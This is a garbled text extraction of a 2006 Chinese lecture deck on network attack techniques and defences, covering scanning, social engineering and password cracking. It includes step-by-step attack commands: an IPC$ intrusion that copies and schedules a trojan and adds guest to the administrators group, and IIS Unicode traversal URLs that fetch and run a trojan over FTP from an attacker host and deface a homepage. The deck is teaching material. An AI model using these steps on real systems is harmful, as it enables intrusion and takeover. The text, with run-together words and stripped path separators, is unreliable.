网络常见攻击技术及防御措施教材课件.ppt
《网络常见攻击技术及防御措施教材课件.ppt》由会员分享,可在线阅读,更多相关《网络常见攻击技术及防御措施教材课件.ppt(34页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、网络常见攻击技术及防御措施沈传宁沈传宁 上海三零卫士信息安全有限公司上海三零卫士信息安全有限公司上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 1 计算机网络攻防技术计算机网络攻防技术 直奔主题直奔主题l完整的攻击行为踩点(信息收集)入侵留后门抹去痕迹l防范技术针对以上提到的攻击行为提出防范措施上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 2 攻击前奏攻击前奏 踩点踩点l踩点的目的获取对方大概信息主机信息是否存在漏洞密码脆弱性等等指导下一步攻击行为l踩点的方式专用漏洞扫描工
2、具正式渠道:媒体(如搜索引擎、广告介绍等)社会工程学上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 3 信息收集信息收集探测扫描探测扫描 (1)l扫描是“一切入侵的基础”获取对方操作系统信息获取对方主机开放服务信息获知对方可能存在的漏洞获取对方主机用户列表l常用扫描工具漏洞扫描工具 nessus、X-scanner、ISS、Retina探测扫描工具 nmap、supperscan上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 4 信息收集信息收集-探测扫描探测扫描 (2)l国
3、产优秀漏洞扫描器 X-scanner扫描报告示例上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 5 信息收集信息收集-探测扫描探测扫描 (3)l漏洞扫描利器 nessus扫描报告示例上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 6 信息收集信息收集-探测扫描探测扫描 (4)l极好的探测工具-nmap上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 7 信息收集信息收集-正式渠道(正式渠道(媒体)媒体)l网站信息举例:
4、某网络提供商在其网站上宣传“特惠服务器租用:RedHat Linux 8.0 支持MY SQL/PHP 采用性能优异的Apache 1.3.XX Web服务器”l搜索引擎Google搜索例:某Web服务器存在致命错误脚本“5sf67.jsp”攻击者可通过搜索引擎查找存在该错误脚本的网站上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 8 入侵行为入侵行为-社会工程学社会工程学l真实案例一一位安全专家只花了几个小时就完全控制了一家大公司的网络,他所需要作的仅仅是打了几个电话,他是如何作到?l真实案例二 凯文.米特尼克最擅长的是什么?l真实
5、案例三一个大公司的网管犯的错误?上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 9 入侵行为入侵行为 口令破解口令破解l电子邮件口令破解Pop3信箱口令暴力破解l网页表单破解同样属暴力破解,单位时间内重复提交表单,比较返回结果lWindowNT用户口令破解典型工具:l0pht的nt口令破解工具 l*号密码查看简单编程实现l联众、QQ密码窃取重画登陆窗口上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 10 ID:scn psw:123456Ok,you can login in
6、ID:scn psw:No,you can not login in1 12123123412345123456OK,you can login inNo,you can not login inNo,you can not login inNo,you can not login inNo,you can not login in入侵行为口令攻击示意入侵行为口令攻击示意上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 11 入侵行为入侵行为 口令破解工具口令破解工具口令破解工具口令破解工具l工具举例上海三零卫士信息安全有限公司30wi
7、sh Information Security网络安全技术讲座2006 12 入侵行为入侵行为-拒绝服务攻击拒绝服务攻击利用协议漏洞利用协议漏洞利用网络漏洞进行攻击利用网络漏洞进行攻击利用系统漏洞进行攻击利用系统漏洞进行攻击利用服务漏洞进行攻击利用服务漏洞进行攻击大流量洪水攻击大流量洪水攻击上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 13 入侵行为入侵行为-利用系统漏洞利用系统漏洞(IPC$)lIPC$是什么ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(
8、c$,d$,e$)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.l前提例如:使用X-scanner扫描到某Win2K主机允许空连接,且共享IPC$,管理员administrator口令为passwordl目的在目标主机上运行木马程序以完全控制该主机上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 14 入侵实例入侵实例
9、IPC$l攻击步骤建立连接C:net use 127.0.0.1IPC$/user:admintitrator拷贝木马服务器端C:copy srv.exe 127.0.0.1admin$查看对方时间C:net time 127.0.0.1 定时启动木马服务器端C:at 127.0.0.1 11:05 srv.exe 连接木马新建用户hackerC:net user guest/active:yes 将用户加入管理员组C:net localgroup administrators guest/add 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲
10、座2006 15 入侵行为入侵行为-利用服务漏洞利用服务漏洞(UNICODE)lUNICODE漏洞介绍微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令 当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件 l漏洞利用如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能列出当前目录的内容:http:/202.116.33.27/scripts/././winnt/system32/cmd.exe?/c+
11、dir利用这个漏洞查看系统文件内容也是可能的:http:/ 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 16 入侵行为入侵行为-UNICODE UNICODE攻击攻击攻击攻击l攻击步骤拷贝cmd.exe至scripts目录 http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsccc.exe 写入ftp批处理文件http:/x.x.x.x/scripts/ccc.exe?/c+echo
12、+open+*.*.*.*hacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+userhacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+passhacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exehacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+byehacker.txt 运行该批处理文件 http:/x.x.x.x/scripts/ccc.exe?/c+ftp+-s:hacker.tx
13、t执行下载的文件(木马服务器端)http:/x.x.x.x/scripts/ccc.exe?/c+srv.exe木马客户端连接或者修改其主页http:/x.x.x.x/scripts/ccc.exe?/c+echo+hacked by hahaha c:inetpubwwwrootindex.html 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 17 入侵行为入侵行为-缓存溢出攻击缓存溢出攻击缓存溢出攻击缓存溢出攻击(.(.idqidq缓存溢出攻击缓存溢出攻击缓存溢出攻击缓存溢出攻击)l漏洞描述微软IIS默认安装情况下带了一个索引
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 网络 常见 攻击 技术 防御 措施 教材 课件
限制150内